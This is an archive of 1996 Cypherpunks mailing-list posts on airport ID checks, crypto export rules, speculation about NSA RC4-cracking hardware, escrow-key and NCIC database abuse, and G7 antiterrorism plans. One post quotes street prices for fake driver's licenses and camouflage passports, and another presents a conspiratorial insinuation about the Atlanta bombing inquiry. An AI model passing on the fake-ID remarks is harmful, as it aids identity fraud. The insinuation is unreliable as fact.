From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Thu, 1 Aug 1996 08:32:09 +0800
To: jya@pipeline.com
Subject: Re:  G7T_err
Message-ID: <9607312039.AA07728@lada>
MIME-Version: 1.0
Content-Type: text/plain


thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 05:14:21 +0800
To: cypherpunks@toad.com
Subject: Re: "An who shall guard the guardians?"
Message-ID: <2.2.32.19960731175954.0087e798@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 AM 8/1/96 -0700, Timothy C. May wrote:
>
>The Latin maxim "And who shall guard the guardians?" has some relevance to
>the headlong rush into converting the U.S. into even more of a security
>state than it is now.

Quis custodiet ipsos custodes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 05:13:33 +0800
To: cypherpunks@toad.com
Subject: Re: Photo IDs (Re: A Libertine Question)
Message-ID: <2.2.32.19960731180000.00865ea0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:56 AM 8/1/96 -0700, Timothy C. May wrote:
>I can easily make my own photo I.D.s, or even order "fake I.D.s" from
>various mail-order outlets advertising in the Usual Places. If I show up at
>the airline with two photo I.D.s, one showing me to be "Security Officer
>Mickey Mouse" and the other showing me to be "Mickey Mouse, Internal
>Security Agency," will I be violating any laws?
>
>--Mickey Mouse (I just changed my name--if you don't like it, FAA, fuck off)

They want "government-issued" photo ID.  They haven't said which government
have they.  Time to get my Barbados driver's license.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 10:19:59 +0800
To: cypherpunks@toad.com
Subject: Re: Violation or Protection? [OLYMPICS]
Message-ID: <ae2517e5040210049686@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:03 PM 7/31/96, David Rosoff wrote:

>I don't have any crypto references, but due to the Libertarian overtones
>on this list I believe it is on-topic enough.

I think this topic (thanks for raising it) is actually on-topic, as the
proposals for "voluntary" escrow are somewhat similar. It all comes back to
search warrants, due process, prior restraint, and other constitutional
issues.

>On the local news I saw footage of a couple schmoozing in the Olympic
>(Centennial?) Park after its reopening. The voice-over said that all
>bags are being searched, and the couple said that rather than be
>alarmed or nervous, they "appreciated" it.
>
>I'm not quite sure what to think about this. I don't have enough
>experience to form a well thought-out opinion. I'd like to hear some
>of everyone's thoughts on this: Is this bag-searching a violation,
>(which was my immediate reaction) or is it not, because you have to
>already be going into the controlled area to get searched?

I have mixed thoughts as well.

On the one hand, were I to be hanging out in this park, given the recent
event and the focus on this park for crazies to attack, I would feel better
if bags were at least briefly looked into and "suspicious" bags left
unattended covered with explosive-containing shields.

On the other hand, a public place is a public place, and searches without
warrants are explicity forbidden by the Constitution. (Some dispute exists
about this, such as searches of bags on buses...I think the Supremes ruled
that cops can search bags on buses without warrants...a bad precedent, I
think.)

If the Centennial Park is a public place, not a private one, as I believe
to be the case, then it seems to me a person is within his rights to turn
down the offer to be inspected, frisked, interrogated, etc.

(There may be enabling emergency powers covering specific sites. I believe
such conditions apply when, for example, the President or other such royal
figures are mixing with the proles.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 08:51:04 +0800
To: cypherpunks@toad.com
Subject: Re: Photo IDs (Re: A Libertine Question)
Message-ID: <ae251a33050210042114@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:09 PM 7/31/96, William Knowles wrote:
>
>What about one of those camouflage passports from Britsh Honduras
>that they sell in the back of the Robb Report for $300?
>
>I personally doubt that your basic $4.75 an hour airport security
>guard knows about that.

All of the I.D. checks I have received have been at the ticket counter, to
receive my boarding pass. The airport security guards have never asked me
for any form of I.D., picture or otherwise.

(As has been commented upon by many analysts, it's likely that the airline
companies are enforcing the picture I.D. rule so as to stop the practice of
people buying discount tickets and then selling them to others.
Specifically, many corporations buy tickets in advance of knowing who the
actual business traveller will be. The airlines are causing many who arrive
at the ticket counter to "upgrade" to a full-fare ticket under their real
name.)

The "security" implications are a joke. More pablum fed to the gullible.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 1 Aug 1996 09:32:20 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <Pine.LNX.3.95.960731154700.578A-100000@gak>
Message-ID: <31FFCD1E.3F54@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> On Tue, 30 Jul 1996, Tom Weinstein wrote:
> 
>> We won't do this.  Our domestic version will always contain the
>> strongest crypto we can provide.
> 
> Then what is the concern about anonymous arms-traffickers uploading
> the strong crypto version to foreign FTP sites?  I recall you saying
> that the State Department might revoke Netscape's "permission" to
> provide a domestic version if it was exported.

The only thing they can revoke is their permission to provide it for
download over the internet.  They can't revoke our permission to sell
it in stores or via snail mail.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 1 Aug 1996 09:48:38 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Photo IDs (Re: A Libertine Question)
In-Reply-To: <Pine.SUN.3.94.960731125431.29007C-100000@infinity.c2.net>
Message-ID: <Pine.SUN.3.91.960731141759.26637B-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 31 Jul 1996, William Knowles wrote:

> What about one of those camouflage passports from Britsh Honduras
> that they sell in the back of the Robb Report for $300? 

Way overpriced.  Last time I looked, camouflage passports were in
the US$125 range.  A Hutt River passport goes for US$50.  On the
streets of New York, LA and San Francisco, passable drivers
licenses are available in the US$25-40 range.

"My mother told me, you gotta shop around."


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 10:01:19 +0800
To: cypherpunks@toad.com
Subject: Re: Dry Under the Waterfall
Message-ID: <ae251c7e06021004aaeb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:47 PM 7/31/96, Duncan Frissell wrote:

>This is provably false.  People can learn whatever they have to.  (Within
>very broad intellectual limits.)  If they *choose* not to learn (and you are
>not their parent or employer), it is a violation of their autonomy to
>browbeat them.  You should leave them alone in their ignorance and, of
>course, not waste any money helping them since they have demonstrated that
>they aren't interested.  An economist might say that those who reject
>education are making a choice.  They are deciding that, for them, the value
>of today's leisure (L) plus today's income (I) is greater than the
>recreational value of education (R) plus the present value (PV) of future
>financial and psychic gains from education.
>
>L + I > R + PV

Indeed. People make tradeoffs all the time. They choose "easier subjects"
to major in, to take classes in, etc. They join fraternities, they "party
hard," they snort coke, they do whatever they do. (James Bugden will no
doubt claim that I am making moral judgments....no, just stating the
situation.)

>In other words, all those people who were drinking beer or working
>construction while TM was going to college, graduate school, studying
>physics, and working for Intel were making the decision that *for them* the
>value of all that time off, plus current income, plus lack of skull sweat
>was greater than the chance of becoming a millionaire and retiring at
>30-something.  And they may well be right.  In any case, we should honor
>their choices as we expect them to honor ours.  To intervene in a big way in
>their lives (or in TMs) to challenge their choices is deeply wrong.  We
>can't tell from the outside what the value of the education/work/leisure
>tradeoff is for an individual.  All we can do is observe their actions.

And even "education" is not enough. I recall folks around me spending their
Intel salaries and stock options about as quickly as they earned them--on
speed boats, BMWs, trips to exotic locales, and, yes, on drugs.

I opted for the lesson of "The Grasshopper and the Ant," and prepared for
the future, purchasing my stock options out of salary savings and "holding"
on to the stock. Some of those around me probably wondered why I was still
driving my beat up Mazda RX-2 and buying stock in funny companies like
Apple, Sun, and Coherent.

I hear that "The Grasshopper and the Ant" is no longer considered proper
reading material for children, that they need to have their self-esteem
raised, that "I Have Two Mommies" is a more important book for them to
read.

"Feh."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 07:18:18 +0800
To: Vinnie Moscaritolo <cypherpunks@toad.com
Subject: re:WaPo on Crypto-Genie Terrorism
Message-ID: <2.2.32.19960731183622.008599f8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:17 AM 7/31/96 -0800, Vinnie Moscaritolo wrote:

>"The people of Burgdorf went to parades and speeches--some because they
>genuinely believed in their leaders; others, because not to go would call
>attention to themselves.  Most practiced the silence they were familiar
>with, a silence nurtured by fear and complicity that would grow beyond
>anything they could imagine, mushrooming into the decades after the war
>which, some began to fear, was about to happen.

The Nets sure haven't been silent, however.  Tyranny is tougher these days.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Thu, 1 Aug 1996 06:38:45 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defc
Message-ID: <TCPSMTP.16.7.31.14.38.18.2645935021.658064@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


  
 >At this year's DefCon (last weekend), there were two speakers from the
 >recently created FBI San Francisco Computer Crime division. they were there 
 >as spokesmen for the FBI, but people could talk to them later and ask any
 >questions they liked, and "the answers may surprise you".  Evidence that 
 >maybe some goons really do have a clue, but are still too afraid to do
 >anything about it... //cerridwyn//

 Since they were speakers, could they be part of the Spot The Fed contest?


 P.J.
 pjn@nworks.com



... Can not read right brain:  <A>bort <R>etry <F>rolic

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Thu, 1 Aug 1996 06:49:41 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie
Message-ID: <TCPSMTP.16.7.31.14.38.24.2645935021.658065@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > ... I've unsubscribed ...

 In> Door.  Ass.  Bump.

 Just be happy :)


 P.J.
 pjn@nworks.com



... Press any key ...                                     EXCEPT THAT ONE!

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Thu, 1 Aug 1996 08:48:29 +0800
To: risks@csl.sri.com
Subject: Re: "And who shall guard the guardians?"
In-Reply-To: <ae24db790002100463bd@[205.199.118.202]>
Message-ID: <v03007802ae25847d465c@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


On Cyperpunks recently, Tim May wrote:

>The Latin maxim "And who shall guard the guardians?" has some relevance to
>the headlong rush into converting the U.S. into even more of a security
>state than it is now.

About 30 (thirty) years ago, I asked the same question at a large
computer conference. Then, a representative of the FBI was presenting
the NCIC computer system that was under development at the time. This
system gives local officials access to a national database of arrest
and conviction information.

I asked the speaker how they would prevent misuse of the system by
people who had legitimate access to it. The example I used was
a deputy sheriff who ran a insurance agency on the side. The FBI
official had no answer. My question was subsequently published
a few months later in a letter to the editor in (as I recall)
Modern Data, February 1966, again without answer.

This question is also relevant to escrowed encryption: how to
prevent misuse of escrowed keys by file clerks and other people
who need access to the keys as part of their legitimate duties.
Since these keys will protect a very large amount of money (consider
the encryption keys used for interbank clearing) and since we
know from the Aldrich Ames case that $3,000,000 can buy a
high-ranking CIA employee, there are significant problems that
need to be addressed. I would suspect that a Baysian analysis
would indicate that the risk of holding (and losing) a key is
greater than the risk of not holding (and needing) a key.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 1 Aug 1996 09:07:13 +0800
To: cypherpunks@toad.com
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <199607312158.OAA21831@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I have really scrambled up the quotes from verious people.  My appologies
if you think I have misrepresented your viewpoints.

>Bill Frantz said:
>>If we assume a machine designed to break *every* message, NSA's response
>>makes more sense.
>
At  4:07 PM 7/31/96 -0700, Timothy C. May wrote:
>I don't believe that even _they_ would plan for something like this, unless
>RC4 is a lot weaker than experts seem to think it is.

One of NSA's traditional roles is to automatically scan communications and
pull out the "interesting" stuff.  To continue this role, they have to be
able to decrypt the messages.  I wouldn't, particularly when thinking in
paranoid mode, assume they have given up on that role.


At  2:14 AM 7/31/96 -0800, Jim McCoy wrote:
>There are two types of FPGAs, one is based on anti-fuse technology which is
>essentially a big complicated PROM, but the Xilinx FPGAs use SRAM to
>configure the interconnections between logic elements.  ...

At  9:07 AM 7/31/96 -0800, jim bell wrote:
>However, I think it very unlikely that an organization like the NSA would 
>bother with an FPGA to do a cracking engine.  FPGA's have substantial 
>limitations, as you alluded to above, due to the need to make them "general 
>purpose."  A non-field programmable Gate Array, a hard-wired chip, would 
>tend to optimize the interconnections on chip including minimizing the 
>delays, but not incur the full-custom costs such as the penalty for low volume.

>Bill Frantz said:
>>Now I have no problem with believing NSA would invest $7 million.  However,
>>$700 million makes me wonder.  With FPGAs, there is a significant risk that
>>people will change the crypto system and make the investment worthless.
>>(Which, I guess, is why they prefer general purpose computers.)  However,
>>if they can get the equivalent of a few bits of key back by cryptanalysis,
>>then they knock the costs down to entirely reasonable (for them) levels.

I was assuming program only once chips, like the old burn-the-fuse PROMs. 
If you are ordering in quantity 700,000, for the RC4-40 engine, then you
have no need to worry about the cost of small runs of Mask programmed
chips.


At  4:07 PM 7/31/96 -0700, Timothy C. May wrote:
>I conclude, roughly speaking, that spending $100 M on a specialized machine
>to break RC4 or any other modern cipher (that is breakable at the key
>lengths used) would not even give them pause.

If they are using Programmable-only-once Gate Arrays or Mask programmed
ones, $700 million for a machine which will cost $7 million for a simple
reprogramming might give them pause.  Or at least make them consider if
there is an alternative.  If they are using easily reprogrammable arrays,
then they have a general purpose computer specialized for certain types of
parallel processing.  If this machine cost $100 million, I agree they would
probably build it.


At 12:42 AM 7/31/96 -0700, David Wagner wrote:
>Those estimates assume that a single FPGA can break RC4 in hours.  I think
>that is an extremely optimistic assumption, given the available public
>information.  But perhaps NSA is orders of magnitude ahead of us in chip
>design (unlikely) or orders of magnitude ahead of us in RC4 cryptanalysis
>(and we're back to paranoid musings).

>> If we assume a machine designed to break *every* message, NSA's response
>> makes more sense.

I feel like I'm leaning over backwards to defend NSA's response, an
extremely uncomfortable position (and I could crack my skull when I fall)
:-).  The most important issue is, what is NSA's state of the art.  If we
accept their $1000/FPGA chip, then they are indeed at the bleeding edge,
and suffering from the associated low chip yields.  If they are at the best
cost-performance point for 2-3 years ago or whenever they started approving
the export of RC4-40, then they are certainly subject to David Wagner's
performance limits.

A number of people have mentioned the heat problems.  I, and I think also
NSA, never said they couldn't be solved, but solving them involves
engineering costs, whether it is to design cooling or distribution
techniques.  I think the bullets in their response were primarily to
justify that $10 million NRE cost.  (Getting to $10 million isn't hard on a
government project.)


At  2:14 AM 7/31/96 -0800, Jim McCoy wrote:
>One of the speakers ... was the Product Line Manager from Xilinx and one of
>the goodies he handed out was pre-release data sheets for the new XC6200
>series of FPGAs they are producing (the chips are already out in limited
>quantities) so here is a little update on the state of the art in this area.
>
>The interconnection problem has also been solved in this chip series. ...
>Given the relatively compact design in Ian and
>Dave's paper and the new chips one might even fit two or four cracking
>engines on a single FPGA.
>
>The newest line from
>Xilinx, the XC6000 series has the capability to be reconfigured either
>partially or completely from an on-chip cache in 5 ns.  That is five
>nanoseconds and you have a completely different piece of virtual hardware. If
>the configuration is loaded through the slowest I/O port on the chip it only
>takes 200 microseconds.

Given this kind of hardware, the only reasonable assumption is that if NSA
hasn't built a general purpose cracking engine, they will.


>Even if the encryption algorithm is secret these
>chips open up interesting posiblities for developing general-purpose
>cryptanalysis machines. [Hmm, there may be a paper in there... "Evolving A
>General-Purpose Cryptanalysis Engine"...]

The idea of a genetic system to "learn" an unknown cypher system and then
brute force crack it is indeed worth a paper, perhaps several.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 1 Aug 1996 03:01:53 +0800
To: cypherpunks@toad.com
Subject: G7T_err
Message-ID: <199607311507.PAA03675@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Excerpts of four reports on the G7+1 antiterrorism meet in 
   Paris: 
 
 
   WSJ: 
 
 
      + Mass Transport: The International Civil Aviation 
      Organization will implement new standards for bomb 
      detection at domestic and international airports. The 
      eight nations will jointly develop standards for more 
      detailed and accurate passenger and cargo lists, as well 
      as new vehicle-identification tagging methods to make 
      car-bombing investigations easier, U.S. officials said. 
 
 
      + Information Sharing: The U.S Federal Bureau of 
      Investigation will lead an effort to develop an 
      international forensic database. The FBI offered to 
      share certain computer records with the other seven 
      countries. 
 
 
      + Wiretapping and Internet: The eight countries said 
      they would develop new lawful means to intercept 
      communications among terrorists. They agreed to study 
      how to prevent the Internet from becoming a tool for 
      planning and executing terrorist events. 
 
 
      + Explosives Tracing: The U.S. will share its research 
      on new technologies to trace the origin of explosive 
      devices U.S. officials said, and will push for 
      international use of such technologies if they are found 
      to be workable. 
 
 
      + Other Measures: Controlling trade in certain weapons 
      and chemicals financing of terrorist organizations and 
      forgery of travel documents also will be studied. 
 
 
   WaPo: 
 
 
      The 25-point plan calls for close cooperation in 
      formulating a range of security measures, including 
      tightened controls on firearms and explosives; 
      prevention of terrorist communications on the Internet; 
      improved bomb detection methods at airports; and 
      interdiction of terrorist groups' financial resources. 
      They also called for the expediting of extradition 
      procedures and faster exchanges of information on 
      terrorist activities, including any use of chemical, 
      biological or nuclear materials. Details on all 25 
      points were left for law enforcement and forensic 
      experts to work out, with deadlines for finalization of 
      specific measures set for 90 days to six months. 
 
 
   FiTi: 
 
      Among the measures agreed in Paris were an accelerated 
      programme of research designed to find ways to mark 
      explosives so their origin could be identified after a 
      blast; the development of ways to prevent terrorists 
      using electronic or wire communication systems, 
      including the Internet and tougher sentences. The 
      ministers also called for investigations into 
      organisations with social, charitable and cultural goals 
      which were abused by terrorists; restrictions on asylum- 
      seeking by those who had committed attacks or were 
      suspected of planning or funding them; and more 
      effective border controls and extradition procedures. 
 
 
   NYP: 
 
      The details were not all made public today, but the 
      measures the officials agreed to draft included devising 
      methods to monitor terrorist attempts to communicate 
      over the Internet; developing standards to make it 
      easier to trace the origin of explosives used in 
      terrorist bombs and cracking down domestically on the 
      manufacture, sale, transport and export of explosives 
      and firearms. 
 
 
---------- 
 
   For extensive background, links to related sites and latest 
   information on the G7 series of meetings see: 
 
 
      http://www.diplomatie.fr/actual/g7lyon/index.gb.html 
 
 
---------- 
 
 
   For today's four full reports: 
 
 
   http://jya.com/g7terr.txt   (20 kb for 4) 
 
 
   G7T_err 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 1 Aug 1996 07:42:23 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: RE: A Libertine Question
Message-ID: <9606318388.AA838851822@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> wrote:
<Something about horseshit not being allowed on city streets>
_________________

Punkers denounce arrests - Police nab 70
Montreal Gazette, July 30, 1996, Page A1

Punkers returned to Berri park last night to protest against the arrest of 70 of
their own during an earlier demonstration in defiance of a city curfew on parks.

More than 250 punkers and other marginalized youth gathered in the park around
12:30 a.m. yesterday to protest against a new bylaw that changed the designation
of the site from a *public place* to a city park.

The change means that the park closes between midnight and 6 a.m. and can't be
used overnight by punkers and the homeless.

The bylaw also gives police the power to ticket people for such infractions as
walking on the grass or taking up more than one space on a park bench.
_________________

Greg Broiles <gbroiles@netbox.com> wrote:
>The regulation of ordinary social and economic activity is not a
>"homelessness issue", it's a "freedom issue". If you admit that it can
>legitimately be regulated but reassure yourself with your trust in the
>discretion and good judgement of the regulators, your liberty is more a
>matter of grace than of right. Have a nice day.  

Welcome to our model community. Please don't walk on the grass. Sit up straight.
And remember to smile at all times.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 09:00:50 +0800
To: cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?"
Message-ID: <ae252afa07021004122c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:57 PM 7/31/96, Martin Minow wrote:
>On Cyperpunks recently, Tim May wrote:
>
>>The Latin maxim "And who shall guard the guardians?" has some relevance to
>>the headlong rush into converting the U.S. into even more of a security
>>state than it is now.
>
>About 30 (thirty) years ago, I asked the same question at a large
>computer conference. Then, a representative of the FBI was presenting
>the NCIC computer system that was under development at the time. This
>system gives local officials access to a national database of arrest
>and conviction information.

Abuses of the NCIC system are legend. I once received the home address (and
other particulars) involving the famously-reclusive Thomas Pynchon. (The
author of "Gravity's Rainbow," "V," "The Crying of Lot 49," and "Vineland"
has not ever given a public interview, no photos are known to exist of him
since his 1954 high school yearbook photo, and even his residence was
unknown.)

Pynchon, as I have noted before here, lived for almost 10 years about 3
miles from me; I may have passed him many times in local stores and on the
street. Without knowing it, of course.

A "fan" of his used the NCIC system, the data base into which all drivers
and many others are placed, to locate him. At least this fan did not stalk
and kill him, as has happened in the past with NCIC data base accesses.

As we computerize the Surveillance State, the possibilities for abuse and
for repression (if not by Clinton, then by others, or by Aldrich Ames-type
situations) become astronomical. The "key registration" and "national I.D.
card" proposals just square or cube the problem.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 07:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: Dry Under the Waterfall
Message-ID: <2.2.32.19960731194703.00860464@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 AM 7/30/96 -0700, David Kline wrote:
>
>A question though: What about the 3 million hard-working, reading, 
>middle-class folks who have been downsized into oblivion the last three 
>years alone? What about the tens of millions of readers who had the skills
>needed for the industrial age, but not for the information age?

I forgot to include a little anecdote about education in my original post.
There seems to be a belief extant that education is something that you are
completely dependent on others for.  The masses will just sit there and melt
away unless they are given a "program."

"I need a program.  Who's got a program?  We need a program.  All God's
chillun's got programs."

This is provably false.  People can learn whatever they have to.  (Within
very broad intellectual limits.)  If they *choose* not to learn (and you are
not their parent or employer), it is a violation of their autonomy to
browbeat them.  You should leave them alone in their ignorance and, of
course, not waste any money helping them since they have demonstrated that
they aren't interested.  An economist might say that those who reject
education are making a choice.  They are deciding that, for them, the value
of today's leisure (L) plus today's income (I) is greater than the
recreational value of education (R) plus the present value (PV) of future
financial and psychic gains from education.

L + I > R + PV

In other words, all those people who were drinking beer or working
construction while TM was going to college, graduate school, studying
physics, and working for Intel were making the decision that *for them* the
value of all that time off, plus current income, plus lack of skull sweat
was greater than the chance of becoming a millionaire and retiring at
30-something.  And they may well be right.  In any case, we should honor
their choices as we expect them to honor ours.  To intervene in a big way in
their lives (or in TMs) to challenge their choices is deeply wrong.  We
can't tell from the outside what the value of the education/work/leisure
tradeoff is for an individual.  All we can do is observe their actions. 

If you doubt that people can learn if they really have to...

Greta spent her teens fleeing with he mother from Poland into the USSR on
foot in advance of the Wermacht (religious differences).  As the Wermacht
receeded, so did Greta and her mother who preferred the West.  In the course
of events, they ended up in a Displaced Persons (DP) camp in Austria.  There
was an understandable reluctance on the part of the DP to be repatriated to
areas in the Soviet Zone of Occupation.  (Operation Keelhaul would later
hand many thousands of DPs over to the commies.)  England or America were
*by far* the first choice.  A rumor went around the camp that England was
desperately short of glove makers.  Some people in the camp knew how to make
gloves.  Within a few weeks, everyone in the camp knew how to make gloves.
English lessons were also very popular.  There were no "programs" to teach
either of these skills.

The happy ending to the story is that Greta and her mother secured a trip to
New York City.  In the 45 years since she's been here, Greta has neither
returned to Europe or ever felt the desire to do so in spite of the superior
European social welfare systems.  When asked why, she says that Europe had
its shot at her and she doesn't believe in tempting fate.     

The point is that people can learn if they have to and if they don't have to
they don't have to.  Life in America today is as easy as it's ever been in
human history (at least since the invention of agriculture), so if people
want to relax we should let them -- and not subsidize them.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 1 Aug 1996 08:05:19 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <31FEAD9C.167E@netscape.com>
Message-ID: <Pine.LNX.3.95.960731154700.578A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 30 Jul 1996, Tom Weinstein wrote:

> We won't do this.  Our domestic version will always contain the
> strongest crypto we can provide.

Then what is the concern about anonymous arms-traffickers uploading the strong
crypto version to foreign FTP sites?  I recall you saying that the State
Department might revoke Netscape's "permission" to provide a domestic version
if it was exported.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMf+5XLZc+sv5siulAQGtCAQApSlizPMEOk5pz2FUuHgJC+VTDzBCzmfi
zGPFdRCZMFTqovBA1+IoFFtUAbJzejfo+fglgt/tfV6nkxj8ThUwtXj1dFlFbrat
7l0Citoo3J7WUS0Y95SLh8EWb2UKoJGfyHkCz5RGt4PMaQSddXnGk2MppE1giCxm
jmMqleiOuVU=
=k7vj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 1 Aug 1996 09:36:49 +0800
To: cypherpunks@toad.com
Subject: Re: "An who shall guard the guardians?"
Message-ID: <199607312255.PAA11535@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 AM 8/1/96 -0700, Timothy C. May wrote:
>
>The Latin maxim "And who shall guard the guardians?" has some relevance to
>the headlong rush into converting the U.S. into even more of a security
>state than it is now.
>
>The investigation in Atlanta is now focussing on a rent-a-cop who may have
>planted the pipe bomb and then "discovered" it. Check the usual Web news
>sources for more details. Whether he is the bomber or not is not the point,
>which is, "who watches the cops?"

The timing of the revelation of the investigation's interest in Jewell, the 
rent-a-cop, is highly suspicious.  We have now learned that (contrary to 
previous reports that the bomb exploded 18 minutes after the warning was 
given by telephone), in fact the 911 people wasted about 10 minutes trying 
to figure out the address of the park.  Even though this story did indeed 
get reported by the media, a little, "as if on cue" the interest in Jewell 
was leaked. It gives the media something to talk about other than the known 
official screwup.

A coincidence?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Thu, 1 Aug 1996 07:37:22 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Secure drive under Win95... a better way.
Message-ID: <2.2.32.19960731195620.0068a8b4@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


After much fiddling, I've found (IMHO) a "good" way of using secure drive
1.4a under Win95.  After doing the partitioning and encrypting, put the
